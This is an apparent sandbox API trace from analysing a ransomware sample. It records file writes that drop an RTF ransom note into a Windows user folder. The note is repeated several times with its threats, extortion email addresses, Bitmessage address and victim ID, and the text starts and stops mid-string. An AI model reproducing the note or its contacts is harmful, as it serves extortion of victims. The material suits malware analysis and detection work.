y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.778] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.779] CloseHandle (hObject=0x284) returned 1 [0269.779] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\#readme_eman#.rtf")) returned 0xffffffff [0269.779] GetLastError () returned 0x2 [0269.779] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.781] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.781] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.781] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 